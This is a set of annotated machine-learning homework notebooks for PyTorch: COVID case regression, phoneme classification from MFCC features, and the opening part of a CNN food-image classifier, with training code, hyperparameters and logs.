        raw_x_train, raw_x_valid, raw_x_test = train_data[:,:-1], valid_data[:,:-1], test_data

        if select_all:
            feat_idx = list(range(raw_x_train.shape[1]))  # use every feature column
        else:
            feat_idx = [0,1,2,3,4]  # TODO: Select suitable feature columns.
        # Return the selected feature columns of each split, plus the training and validation labels.
        return raw_x_train[:,feat_idx], raw_x_valid[:,feat_idx], raw_x_test[:,feat_idx], y_train, y_valid
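
    For the feature-selection TODO, one common approach is to score each column against the target and keep the top k. A minimal sketch for the else-branch above, assuming scikit-learn is available (the value k=24 is an arbitrary placeholder):

    from sklearn.feature_selection import SelectKBest, f_regression

    selector = SelectKBest(score_func=f_regression, k=24)
    selector.fit(raw_x_train, y_train)                      # score columns on the training split only
    feat_idx = selector.get_support(indices=True).tolist()  # indices of the k highest-scoring columns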

    Training Loop

    def trainer(train_loader, valid_loader, model, config, device):
        # Mean squared error between predictions and targets.
        criterion = nn.MSELoss(reduction='mean')  # Define your loss function, do not modify this.

        # Define your optimization algorithm.
        # TODO: Please check https://pytorch.org/docs/stable/optim.html to get more available algorithms.
        # TODO: L2 regularization (optimizer(weight decay...) or implement by yourself).
        # Stochastic gradient descent (SGD) over the model's parameters,
        # with learning rate config['learning_rate'] and momentum 0.7.
        optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.7)
        writer = SummaryWriter()  # TensorBoard writer: logs training metrics for later visualization.

        if not os.path.isdir('./models'):
            os.mkdir('./models')  # Create the directory where models are saved.
        # Training bookkeeping: number of epochs, best loss so far, global step counter, early-stop counter.
        n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

        for epoch in range(n_epochs):
            model.train()     # Set your model to train mode.
            loss_record = []  # stores the loss of every batch in this epoch

            # tqdm is a package to visualize your training progress.
            train_pbar = tqdm(train_loader, position=0, leave=True)

            for x, y in train_pbar:                # iterate over the training set, batch by batch
                optimizer.zero_grad()              # Set gradients to zero so the previous batch doesn't leak into this one.
                x, y = x.to(device), y.to(device)  # Move your data to the compute device (e.g. the GPU).
                pred = model(x)                    # forward pass
                loss = criterion(pred, y)          # loss between predictions and targets
                loss.backward()                    # Compute gradients (backpropagation).
                optimizer.step()                   # Update parameters.
                step += 1
                loss_record.append(loss.detach().item())  # record this batch's loss

                # Display current epoch number and loss on tqdm progress bar.
                train_pbar.set_description(f'Epoch [{epoch+1}/{n_epochs}]')
                train_pbar.set_postfix({'loss': loss.detach().item()})

            mean_train_loss = sum(loss_record)/len(loss_record)    # mean training loss of this epoch
            writer.add_scalar('Loss/train', mean_train_loss, step) # log it to TensorBoard

            model.eval()      # Set your model to evaluation mode before validating.
            loss_record = []  # reuse the list for the validation losses
            for x, y in valid_loader:
                x, y = x.to(device), y.to(device)
                with torch.no_grad():  # validation must not change the model, so gradients stay off
                    pred = model(x)
                    loss = criterion(pred, y)

                loss_record.append(loss.item())

            mean_valid_loss = sum(loss_record)/len(loss_record)  # mean validation loss of this epoch
            # Print the mean training and validation loss of this epoch.
            print(f'Epoch [{epoch+1}/{n_epochs}]: Train loss: {mean_train_loss:.4f}, Valid loss: {mean_valid_loss:.4f}')
            # writer.add_scalar('Loss/valid', mean_valid_loss, step)

            if mean_valid_loss < best_loss:
                # This epoch's validation loss beats the best so far:
                # update the best loss, save the model, and reset the early-stop counter.
                best_loss = mean_valid_loss
                torch.save(model.state_dict(), config['save_path'])  # Save your best model
                print('Saving model with loss {:.3f}...'.format(best_loss))
                early_stop_count = 0
            else:  # otherwise count one more epoch without improvement
                early_stop_count += 1

            if early_stop_count >= config['early_stop']:  # too many epochs without improvement: stop training
                print('\nModel is not improving, so we halt the training session.')
                return
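
    For the L2-regularization TODO above, the simplest option is the optimizer's built-in weight decay; a minimal sketch (the 1e-4 coefficient is an arbitrary assumption):

    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'],
                                momentum=0.7, weight_decay=1e-4)  # weight_decay adds an L2 penalty on the weights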

    Configurations

    config contains hyper-parameters for training and the path to save your model.

    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    config = {
        'seed': 5201314,      # Your seed number, you can pick your lucky number. :)
        'select_all': True,   # Whether to use all features.
        'valid_ratio': 0.2,   # validation_size = train_size * valid_ratio
        'n_epochs': 5000,     # Number of epochs.
        'batch_size': 256,
        'learning_rate': 1e-5,
        'early_stop': 600,    # If the model has not improved for this many consecutive epochs, stop training.
        'save_path': './models/model.ckpt'  # Your model will be saved here.
    }

    Dataloader

    Read data from files and set up the training, validation, and testing sets. You do not need to modify this part.

    same_seed(config['seed'])  # seed everything so each run is reproducible
    # Read the training and test sets from CSV and convert them to NumPy arrays.
    train_data, test_data = pd.read_csv('./covid_train.csv').values, pd.read_csv('./covid_test.csv').values
    # Split the original training data into a new training set and a validation set;
    # train_valid_split takes the raw training data, the validation ratio, and the seed.
    train_data, valid_data = train_valid_split(train_data, config['valid_ratio'], config['seed'])

    # Print out the data size.
    print(f"""train_data size: {train_data.shape}
    valid_data size: {valid_data.shape}
    test_data size: {test_data.shape}""")

    # Select features. select_feat takes the three splits plus a flag:
    # if select_all is True, every feature is used; otherwise a chosen subset is kept.
    x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data, valid_data, test_data, config['select_all'])

    # Print out the number of features.
    print(f'number of features: {x_train.shape[1]}')

    # Wrap each split in a COVID19Dataset.
    train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                                                 COVID19Dataset(x_valid, y_valid), \
                                                 COVID19Dataset(x_test)

    # PyTorch's DataLoader batches a dataset for training. Each loader is given
    # the batch size, whether to shuffle, and pin_memory=True, which pins host
    # memory to speed up host-to-GPU transfers.
    train_loader = DataLoader(train_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    test_loader = DataLoader(test_dataset, batch_size=config['batch_size'], shuffle=False, pin_memory=True)
    train_data size: (2408, 89)
    valid_data size: (601, 89)
    test_data size: (997, 88)
    number of features: 88

    Start training!

    model = My_Model(input_dim=x_train.shape[1]).to(device) # put your model and data on the same computation device.
    trainer(train_loader, valid_loader, model, config, device)
    Epoch [1/5000]: 100%|██████████| 10/10 [00:03<00:00,  3.26it/s, loss=131]
    Epoch [1/5000]: Train loss: 263.8631, Valid loss: 94.9638
    Saving model with loss 94.964...

    ……

    Epoch [998/5000]: Train loss: 3.8978, Valid loss: 6.7839
    Epoch [999/5000]: 100%|██████████| 10/10 [00:00<00:00, 135.57it/s, loss=2.35]

    Plot learning curves with tensorboard (optional)

    TensorBoard is a tool that allows you to visualize your training progress.

    If this block does not display your learning curve, please wait a few minutes and re-run it. It might take some time to load your logging information.

    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    Testing

    The predictions of your model on the testing set will be stored at pred.csv.

    def save_pred(preds, file):
        '''Save predictions to the specified file.'''
        with open(file, 'w') as fp:                     # open the target path in write mode
            writer = csv.writer(fp)                     # a writer from Python's standard csv module
            writer.writerow(['id', 'tested_positive'])  # header row
            for i, p in enumerate(preds):               # one row per sample: its index and its predicted value
                writer.writerow([i, p])

    model = My_Model(input_dim=x_train.shape[1]).to(device)  # rebuild the model with the matching input dimension
    model.load_state_dict(torch.load(config['save_path']))   # load the best checkpoint saved during training
    preds = predict(test_loader, model, device)              # run the trained model over the test loader
    save_pred(preds, 'pred.csv')                             # write the predictions to pred.csv

    Download

    Run this block to download the pred.csv automatically.

    from google.colab import files
    files.download('pred.csv')

    Reference

    This notebook uses code written by Heng-Jui Chang @ NTUEE (https://github.com/ga642381/ML2021-Spring/blob/main/HW01/HW01.ipynb)

    Homework 2: Phoneme Classification

    Task Description

    • Phoneme Classification
    • Training data: 3429 preprocessed audio features w/ labels (total 2116794 frames)
    • Testing data: 857 preprocessed audio features w/o labels (total 527364 frames)
    • Label: 41 classes, each class represents a phoneme

    Objectives:

    • Solve a classification problem with deep neural networks (DNNs).
    • Understand recurrent neural networks (RNNs).

    Some Utility Functions

    Fixes random number generator seeds for reproducibility.

    import numpy as np
    import torch
    import random

    def same_seeds(seed):
        random.seed(seed)
        np.random.seed(seed)
        torch.manual_seed(seed)
        if torch.cuda.is_available():
            torch.cuda.manual_seed(seed)
            torch.cuda.manual_seed_all(seed)
        torch.backends.cudnn.benchmark = False     # disable CuDNN auto-tuning, which can make runs vary
        torch.backends.cudnn.deterministic = True  # force CuDNN onto deterministic algorithms so repeated runs match

    Helper functions to pre-process the training data from the raw MFCC features of each utterance.

    A phoneme may span several frames and is dependent on past and future frames.
    Hence we concatenate neighboring phonemes for training to achieve higher accuracy. The concat_feat function concatenates the past and future k frames (total 2k+1 = n frames), and we predict the center frame.

    Feel free to modify the data preprocessing functions, but do not drop any frame (if you modify the functions, remember to check that the number of frames is the same as mentioned in the slides).

    import os
    import torch
    from tqdm import tqdm

    def load_feat(path):
        feat = torch.load(path)  # load the saved feature tensor of one utterance from disk
        return feat

    def shift(x, n):
        '''
        Frame-shifts a 2-D tensor x along dimension 0: row t of the result is
        x[t + n], with out-of-range positions filled by repeating the boundary
        frame. n > 0 looks n frames into the future, n < 0 looks into the past,
        and n = 0 leaves x unchanged.

        repeat(m, 1) tiles a single row m times along dimension 0; it is used
        here to build the boundary padding. For example, repeating [1, 2, 3]
        three times yields three identical rows [1, 2, 3].
        '''
        if n < 0:
            # Look into the past: pad the front with |n| copies of the first
            # frame and drop the last |n| frames.
            left = x[0].repeat(-n, 1)
            right = x[:n]
        elif n > 0:
            # Look into the future: drop the first n frames and pad the end
            # with n copies of the last frame.
            right = x[-1].repeat(n, 1)
            left = x[n:]
        else:
            # n == 0: nothing to shift.
            return x
        # Concatenate both parts along dimension 0 (the frame axis).
        return torch.cat((left, right), dim=0)

    def concat_feat(x, concat_n):
        '''
        Concatenates each frame with its neighbors: an input of shape
        (seq_len, feature_dim) becomes (seq_len, concat_n * feature_dim),
        where row t holds frames t-k .. t+k (concat_n = 2k+1), with boundary
        frames repeated at the edges.
        '''
        # assert raises an AssertionError if the condition does not hold.
        assert concat_n % 2 == 1  # n must be odd
        if concat_n < 2:          # concat_n == 1 means no context: return x unchanged
            return x
        seq_len, feature_dim = x.size(0), x.size(1)  # sizes of dimension 0 and 1
        # Tile the features concat_n times along dimension 1: (seq_len, concat_n * feature_dim).
        x = x.repeat(1, concat_n)
        # Reshape so dimension 1 has size concat_n and dimension 2 has size
        # feature_dim, then move the copy axis to the front with permute:
        # each of the concat_n slices is now the full sequence.
        x = x.view(seq_len, concat_n, feature_dim).permute(1, 0, 2)  # concat_n, seq_len, feature_dim
        # The middle slice (index mid = concat_n // 2) stays as the center frame.
        # Slice mid + r is shifted r frames into the future and slice mid - r is
        # shifted r frames into the past, so the slices line up symmetrically
        # around the center.
        mid = (concat_n // 2)
        for r_idx in range(1, mid+1):
            x[mid + r_idx, :] = shift(x[mid + r_idx], r_idx)
            x[mid - r_idx, :] = shift(x[mid - r_idx], -r_idx)
        # Undo the permute and flatten back to (seq_len, concat_n * feature_dim).
        return x.permute(1, 0, 2).view(seq_len, concat_n * feature_dim)
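
    A quick sanity check of shift/concat_feat on a toy tensor (the shapes here are made up for illustration, not real MFCC data):

    x = torch.arange(8, dtype=torch.float32).view(4, 2)  # 4 frames, 2-dim features
    out = concat_feat(x, 3)
    print(out.shape)  # torch.Size([4, 6])
    print(out[0])     # tensor([0., 1., 0., 1., 2., 3.]): [frame0, frame0, frame1] -- the past neighbor is a boundary repeat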

    def preprocess_data(split, feat_dir, phone_path, concat_nframes, train_ratio=0.8):
        '''
        Pre-processes one split of the dataset.
        split: which split to build, one of 'train', 'val', and 'test'.
        feat_dir: directory containing the feature files.
        phone_path: directory containing the phone labels and split lists.
        concat_nframes: number of frames to concatenate.
        train_ratio: fraction of utterances used for training (default 0.8); the rest go to validation.
        '''
        class_num = 41  # NOTE: pre-computed, should not need change

        # Map the split to a mode: 'train' and 'val' both read training data, 'test' reads test data.
        if split == 'train' or split == 'val':
            mode = 'train'
        elif split == 'test':
            mode = 'test'
        else:
            raise ValueError('Invalid \'split\' argument for dataset: PhoneDataset!')

        label_dict = {}
        if mode == 'train':
            # Read the per-utterance labels from the label file into label_dict.
            for line in open(os.path.join(phone_path, f'{mode}_labels.txt')).readlines():
                line = line.strip('\n').split(' ')
                label_dict[line[0]] = [int(p) for p in line[1:]]

            # Split training and validation data: shuffle the utterance list, then
            # take the first train_ratio fraction for training and the rest for validation.
            usage_list = open(os.path.join(phone_path, 'train_split.txt')).readlines()
            random.shuffle(usage_list)
            train_len = int(len(usage_list) * train_ratio)
            usage_list = usage_list[:train_len] if split == 'train' else usage_list[train_len:]

        elif mode == 'test':
            usage_list = open(os.path.join(phone_path, 'test_split.txt')).readlines()

        # Strip trailing newlines from the utterance names.
        usage_list = [line.strip('\n') for line in usage_list]
        # Report the number of phone classes and the number of utterances in this split.
        print('[Dataset] - # phone classes: ' + str(class_num) + ', number of utterances for ' + split + ': ' + str(len(usage_list)))

        # Pre-allocate X (and, in training mode, y) with a generous upper bound on the frame count.
        max_len = 3000000
        X = torch.empty(max_len, 39 * concat_nframes)
        if mode == 'train':
            y = torch.empty(max_len, dtype=torch.long)

        # Read each utterance's features into X (and its labels into y).
        idx = 0
        for i, fname in tqdm(enumerate(usage_list)):
            feat = load_feat(os.path.join(feat_dir, mode, f'{fname}.pt'))
            cur_len = len(feat)
            feat = concat_feat(feat, concat_nframes)
            if mode == 'train':
                label = torch.LongTensor(label_dict[fname])

            X[idx: idx + cur_len, :] = feat
            if mode == 'train':
                y[idx: idx + cur_len] = label

            idx += cur_len

        # Trim the unused tail of the pre-allocated tensors.
        X = X[:idx, :]
        if mode == 'train':
            y = y[:idx]

        print(f'[INFO] {split} set')
        print(X.shape)
        # Return X (and y in training mode).
        if mode == 'train':
            print(y.shape)
            return X, y
        else:
            return X

    Dataset

    import torch
    from torch.utils.data import Dataset

    class LibriDataset(Dataset):
        def __init__(self, X, y=None):
            self.data = X
            if y is not None:
                self.label = torch.LongTensor(y)
            else:
                self.label = None

        def __getitem__(self, idx):
            if self.label is not None:
                return self.data[idx], self.label[idx]
            else:
                return self.data[idx]

        def __len__(self):
            return len(self.data)

    Model

    Feel free to modify the structure of the model.

    import torch.nn as nn

    class BasicBlock(nn.Module):
        def __init__(self, input_dim, output_dim):
            super(BasicBlock, self).__init__()
            # BasicBlock is a simple building block: one fully connected layer
            # followed by a ReLU activation, mapping input_dim to output_dim.
            self.block = nn.Sequential(
                nn.Linear(input_dim, output_dim),
                nn.ReLU(),
            )

        def forward(self, x):
            x = self.block(x)
            return x


    class Classifier(nn.Module):
        '''A feed-forward classifier assembled from BasicBlock modules.'''
        def __init__(self, input_dim, output_dim=41, hidden_layers=1, hidden_dim=256):
            '''
            input_dim: dimensionality of the input vector.
            output_dim: dimensionality of the output, i.e. the number of classes (default 41).
            hidden_layers: number of hidden blocks (default 1).
            hidden_dim: width of each hidden layer.
            '''
            super(Classifier, self).__init__()

            self.fc = nn.Sequential(
                # First map the input from input_dim to hidden_dim...
                BasicBlock(input_dim, hidden_dim),
                # ...then stack hidden_layers more blocks to deepen the network...
                *[BasicBlock(hidden_dim, hidden_dim) for _ in range(hidden_layers)],
                # ...and finally project to output_dim to finish the classification.
                nn.Linear(hidden_dim, output_dim)
            )

        def forward(self, x):
            x = self.fc(x)
            return x
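
    Since the structure is meant to be modified, one plausible variant (an illustration, not the reference solution) adds batch normalization and dropout to each block:

    class BasicBlockBN(nn.Module):
        def __init__(self, input_dim, output_dim, p_drop=0.25):  # p_drop is an arbitrary choice
            super().__init__()
            self.block = nn.Sequential(
                nn.Linear(input_dim, output_dim),
                nn.BatchNorm1d(output_dim),  # stabilizes activations between layers
                nn.ReLU(),
                nn.Dropout(p_drop),          # regularizes wider/deeper variants
            )

        def forward(self, x):
            return self.block(x)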

    Hyper-parameters

    # data parameters
    concat_nframes = 3  # the number of frames to concat with, n must be odd (total 2k+1 = n frames)
    train_ratio = 0.75  # the ratio of data used for training, the rest will be used for validation

    # training parameters
    seed = 1213                  # random seed
    batch_size = 512             # batch size
    num_epoch = 10               # the number of training epochs
    learning_rate = 1e-4         # learning rate
    model_path = './model.ckpt'  # the path where the checkpoint will be saved

    # model parameters
    input_dim = 39 * concat_nframes  # the input dim of the model, you should not change the value
    hidden_layers = 2                # the number of hidden layers
    hidden_dim = 64                  # the hidden dim

    Dataloader

    from torch.utils.data import DataLoader
    import gc  # garbage-collection module, used below to reclaim memory

    same_seeds(seed)  # fix the random seeds
    # Run on the GPU if one is available, otherwise on the CPU.
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    print(f'DEVICE: {device}')

    # Preprocess data: build the training and validation tensors
    # (train_X, train_y, val_X, val_y) with preprocess_data().
    train_X, train_y = preprocess_data(split='train',
                                       feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',  # directory of the audio feature files
                                       phone_path='/kaggle/input/ml2023spring-hw2/libriphone',     # directory of the phone labels and split lists
                                       concat_nframes=concat_nframes,  # how many neighboring frames to concatenate
                                       train_ratio=train_ratio)        # train/validation split ratio
    val_X, val_y = preprocess_data(split='val',
                                   feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
                                   phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
                                   concat_nframes=concat_nframes,
                                   train_ratio=train_ratio)

    # Get the datasets: wrap the tensors of each split in a LibriDataset.
    train_set = LibriDataset(train_X, train_y)
    val_set = LibriDataset(val_X, val_y)

    # Remove the raw features to save memory.
    del train_X, train_y, val_X, val_y
    gc.collect()  # reclaim the now-unreferenced memory

    # Get the dataloaders: batch each dataset with the chosen batch_size,
    # shuffling the training data but not the validation data.
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
    val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)
    DEVICE: cuda
    [Dataset] - # phone classes: 41, number of utterances for train: 2571
    2571it [00:23, 107.38it/s]
    [INFO] train set
    torch.Size([1588590, 117])
    torch.Size([1588590])
    [Dataset] - # phone classes: 41, number of utterances for val: 858
    858it [00:02, 308.31it/s]
    [INFO] val set
    torch.Size([525078, 117])
    torch.Size([525078])

    Training

    # Create the model, define a loss function, and an optimizer.
    # The Classifier is built with the chosen input_dim, hidden_layers and
    # hidden_dim, and moved to the device selected earlier.
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    # Cross-entropy loss for classification.
    criterion = nn.CrossEntropyLoss()
    # Adam optimizer over the model's parameters, so backpropagation can update the weights.
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)

    best_acc = 0.0
    for epoch in range(num_epoch):  # train for num_epoch epochs
        # Reset the per-epoch accumulators.
        train_acc = 0.0
        train_loss = 0.0
        val_acc = 0.0
        val_loss = 0.0

        # training
        model.train()  # set the model to training mode
        for i, batch in enumerate(tqdm(train_loader)):
            # Move this batch's features and labels to the device.
            features, labels = batch
            features = features.to(device)
            labels = labels.to(device)

            # Clear the gradients left over from the previous step.
            optimizer.zero_grad()
            # Forward pass.
            outputs = model(features)

            # Compute the loss...
            loss = criterion(outputs, labels)
            # ...backpropagate to get the gradients...
            loss.backward()
            # ...and update the parameters.
            optimizer.step()

            # Take the class with the highest score as the prediction.
            _, train_pred = torch.max(outputs, 1)  # get the index of the class with the highest probability
            # Compare predictions with labels to accumulate training accuracy.
            # detach() removes the tensors from the autograd graph; the equality
            # test yields a boolean tensor, sum() counts the correct predictions,
            # and item() converts that count to a Python number.
            train_acc += (train_pred.detach() == labels.detach()).sum().item()
            # Accumulate the training loss.
            train_loss += loss.item()

        # validation
        model.eval()  # set the model to evaluation mode
        with torch.no_grad():
            for i, batch in enumerate(tqdm(val_loader)):
                features, labels = batch
                features = features.to(device)
                labels = labels.to(device)
                outputs = model(features)  # forward pass

                loss = criterion(outputs, labels)  # validation loss

                _, val_pred = torch.max(outputs, 1)
                # Accumulate the validation accuracy and loss.
                val_acc += (val_pred.cpu() == labels.cpu()).sum().item()  # get the index of the class with the highest probability
                val_loss += loss.item()
        # At the end of each epoch, report the average training and validation metrics.
        print(f'[{epoch+1:03d}/{num_epoch:03d}] Train Acc: {train_acc/len(train_set):3.5f} Loss: {train_loss/len(train_loader):3.5f} | Val Acc: {val_acc/len(val_set):3.5f} loss: {val_loss/len(val_loader):3.5f}')

        # If the model improves, save a checkpoint at this epoch:
        # update best_acc, save the parameters to model_path, and log the new best accuracy.
        if val_acc > best_acc:
            best_acc = val_acc
            torch.save(model.state_dict(), model_path)
            print(f'saving model with acc {best_acc/len(val_set):.5f}')

    100%|██████████| 3103/3103 [00:19<00:00, 156.88it/s]
    100%|██████████| 1026/1026 [00:03<00:00, 273.11it/s]
    [001/010] Train Acc: 0.39279 Loss: 2.21685 | Val Acc: 0.43877 loss: 1.97101
    saving model with acc 0.43877
    100%|██████████| 3103/3103 [00:17<00:00, 175.27it/s]
    100%|██████████| 1026/1026 [00:03<00:00, 277.94it/s]

    ……

    [009/010] Train Acc: 0.49606 Loss: 1.72781 | Val Acc: 0.49852 loss: 1.71150
    saving model with acc 0.49852
    100%|██████████| 3103/3103 [00:17<00:00, 180.14it/s]
    100%|██████████| 1026/1026 [00:04<00:00, 241.12it/s]
    [010/010] Train Acc: 0.49840 Loss: 1.71736 | Val Acc: 0.50044 loss: 1.70057
    saving model with acc 0.50044


    del train_set, val_set
    del train_loader, val_loader
    gc.collect()
    23

    Testing

    Create a testing dataset, and load model from the saved checkpoint.

    # load data
    test_X = preprocess_data(split='test', feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat', phone_path='/kaggle/input/ml2023spring-hw2/libriphone', concat_nframes=concat_nframes)
    test_set = LibriDataset(test_X, None)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False)
    [Dataset] - # phone classes: 41, number of utterances for test: 857
    857it [00:08, 103.10it/s]
    [INFO] test set
    torch.Size([527364, 117])


    ## load model
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    model.load_state_dict(torch.load(model_path))
    <All keys matched successfully>

    Make prediction.

    pred = np.array([], dtype=np.int32)  # an empty int32 array that will collect the predictions

    model.eval()  # set the model to evaluation mode
    with torch.no_grad():  # no gradients are needed during inference
        for i, batch in enumerate(tqdm(test_loader)):  # take one batch at a time and move it to the device
            features = batch
            features = features.to(device)

            outputs = model(features)  # forward pass

            # torch.max(outputs, 1) returns the per-sample maximum score and its index;
            # the index along dimension 1 (the classes) is the predicted class.
            _, test_pred = torch.max(outputs, 1)  # get the index of the class with the highest probability
            # Move the batch's predictions back to NumPy and append them to pred.
            pred = np.concatenate((pred, test_pred.cpu().numpy()), axis=0)
    # When the loop finishes, pred holds the model's prediction for every test sample.
    100%|██████████| 1031/1031 [00:01<00:00, 533.21it/s]

    Write prediction to a CSV file.

    After finishing this block, download the file prediction.csv from the files section on the left-hand side and submit it to Kaggle.

    with open('prediction.csv', 'w') as f:
        f.write('Id,Class\n')
        for i, y in enumerate(pred):
            f.write('{},{}\n'.format(i, y))

    HW3 Image Classification

    Solve image classification with convolutional neural networks (CNNs).

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check GPU type.
    !nvidia-smi
    Tue May  2 10:05:59 2023
    +-----------------------------------------------------------------------------+
    | NVIDIA-SMI 470.161.03   Driver Version: 470.161.03   CUDA Version: 11.4     |
    |-------------------------------+----------------------+----------------------+
    | GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
    | Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
    |                               |                      |               MIG M. |
    |===============================+======================+======================|
    |   0  Tesla P100-PCIE...  Off  | 00000000:00:04.0 Off |                    0 |
    | N/A   33C    P0    25W / 250W |      0MiB / 16280MiB |      0%      Default |
    |                               |                      |                  N/A |
    +-------------------------------+----------------------+----------------------+

    +-----------------------------------------------------------------------------+
    | Processes:                                                                  |
    |  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
    |        ID   ID                                                   Usage      |
    |=============================================================================|
    |  No running processes found                                                 |
    +-----------------------------------------------------------------------------+

    Import Packages

    _exp_name = "sample"
    # Import necessary packages.
    import numpy as np
    import pandas as pd
    import torch
    import os
    import torch.nn as nn
    import torchvision.transforms as transforms
    from PIL import Image
    # "ConcatDataset" and "Subset" are possibly useful when doing semi-supervised learning.
    from torch.utils.data import ConcatDataset, DataLoader, Subset, Dataset
    from torchvision.datasets import DatasetFolder, VisionDataset
    # This is for the progress bar.
    from tqdm.auto import tqdm
    import random

    myseed = 6666  # set a random seed for reproducibility
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(myseed)
    torch.manual_seed(myseed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(myseed)

    Transforms

    # Normally, we don't need augmentations in testing and validation.
    # All we need here is to resize the PIL image and transform it into a Tensor.
    test_tfm = transforms.Compose([
        transforms.Resize((128, 128)),
        transforms.ToTensor(),
    ])

    # However, it is also possible to use augmentation in the testing phase.
    # You may use train_tfm to produce a variety of images and then test using ensemble methods.
    train_tfm = transforms.Compose([
        # Resize the image into a fixed shape (height = width = 128).
        transforms.Resize((128, 128)),
        # You may add some transforms here (see the sketch after this block).

        # ToTensor() should be the last one of the transforms.
        transforms.ToTensor(),
    ])
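
    As one illustration of what "some transforms" could be (the specific augmentations and their parameters are assumptions, not the assignment's answer):

    train_tfm = transforms.Compose([
        transforms.Resize((128, 128)),
        transforms.RandomHorizontalFlip(p=0.5),                # mirror half of the images
        transforms.RandomRotation(15),                         # small random rotations
        transforms.ColorJitter(brightness=0.2, contrast=0.2),  # mild photometric noise
        transforms.ToTensor(),
    ])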

    Datasets

    class FoodDataset(Dataset):
        '''
        Subclasses PyTorch's Dataset, one of the components needed to feed
        data into a PyTorch model for training and testing.
        '''

        def __init__(self, path, tfm=test_tfm, files=None):
            '''
            path: directory of the dataset;
            tfm: the preprocessing transform to apply (default test_tfm);
            files: an optional explicit list of files to load (default None).
            '''
            super(FoodDataset).__init__()
            self.path = path
            # Collect and sort the .jpg files under path...
            self.files = sorted([os.path.join(path, x) for x in os.listdir(path) if x.endswith(".jpg")])
            # ...unless an explicit file list was given.
            if files != None:
                self.files = files

            self.transform = tfm

        def __len__(self):
            '''Number of images in the dataset.'''
            return len(self.files)

        def __getitem__(self, idx):
            '''Loads the idx-th image and returns it in the format the model expects.'''
            # Look up the file name for this index...
            fname = self.files[idx]
            # ...open it as a PIL.Image...
            im = Image.open(fname)
            # ...and apply the preprocessing transform, yielding a torch.Tensor.
            im = self.transform(im)

            # The label is parsed from the file name; if parsing fails,
            # the label is set to -1 (the test set has no labels).
            try:
                label = int(fname.split("/")[-1].split("_")[0])
            except:
                label = -1  # test has no label

            return im, label

    Model

    class Classifier(nn.Module):
        def __init__(self):
            super(Classifier, self).__init__()
            # torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
            # torch.nn.MaxPool2d(kernel_size, stride, padding)
            # input dimensions: [3, 128, 128]
            self.cnn = nn.Sequential(
                nn.Conv2d(3, 64, 3, 1, 1),    # [64, 128, 128]
                nn.BatchNorm2d(64),
                nn.ReLU(),
                nn.MaxPool2d(2, 2, 0),        # [64, 64, 64]

                nn.Conv2d(64, 128, 3, 1, 1),  # [128, 64, 64]
                nn.BatchNorm2d(128),
                nn.ReLU(),
                nn.MaxPool2d(2, 2, 0),        # [128, 32, 32]

                nn.Conv2d(128, 256, 3, 1, 1), # [256, 32, 32]
                nn.BatchNorm2d(256),
                nn.ReLU(),
                nn.MaxPool2d(2, 2, 0),        # [256, 16, 16]

                nn.Conv2d(256, 512, 3, 1, 1), # [512, 16, 16]
                nn.BatchNorm2d(512),
                nn.ReLU(),
                nn.MaxPool2d(2, 2, 0),        # [512, 8, 8]

                nn.Conv2d(512, 512, 3, 1, 1), # [512, 8, 8]
                nn.BatchNorm2d(512),
                nn.ReLU(),
                nn.MaxPool2d(2, 2, 0),        # [512, 4, 4]
            )
            self.fc = nn.Sequential(
                nn.Linear(512*4*4, 1024),
                nn.ReLU(),
                nn.Linear(1024, 512),
                nn.ReLU(),
                nn.Linear(512, 11)
            )

        def forward(self, x):
            out = self.cnn(x)
            out = out.view(out.size()[0], -1)  # flatten
            return self.fc(out)
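
    The bracketed comments track the tensor shape through the network; a throwaway snippet to verify that bookkeeping (assuming a fresh CPU model and fake images):

    dummy = torch.randn(2, 3, 128, 128)  # two fake RGB images
    print(Classifier()(dummy).shape)     # expected: torch.Size([2, 11])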

    Configurations

    # "cuda" only when GPUs are available.
    device = "cuda" if torch.cuda.is_available() else "cpu"

    # Initialize a model, and put it on the device specified.
    model = Classifier().to(device)

    # The batch size.
    batch_size = 64

    # The number of training epochs.
    n_epochs = 8

    # If no improvement in 'patience' epochs, early stop.
    patience = 300

    # For the classification task, we use cross-entropy as the measurement of performance.
    criterion = nn.CrossEntropyLoss()

    # Initialize the optimizer; you may fine-tune hyperparameters such as the learning rate on your own.
    optimizer = torch.optim.Adam(model.parameters(), lr=0.0003, weight_decay=1e-5)

    Dataloader

    # Construct the train and valid datasets with the transforms defined above.
    train_set = FoodDataset("/kaggle/input/ml2023spring-hw3/train", tfm=train_tfm)
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)
    valid_set = FoodDataset("/kaggle/input/ml2023spring-hw3/valid", tfm=test_tfm)
    valid_loader = DataLoader(valid_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)

    Start Training

    # Initialize trackers. These are not parameters and should not be changed.
    stale = 0
    best_acc = 0

    for epoch in range(n_epochs):

        # ---------- Training ----------
        # Make sure the model is in train mode before training.
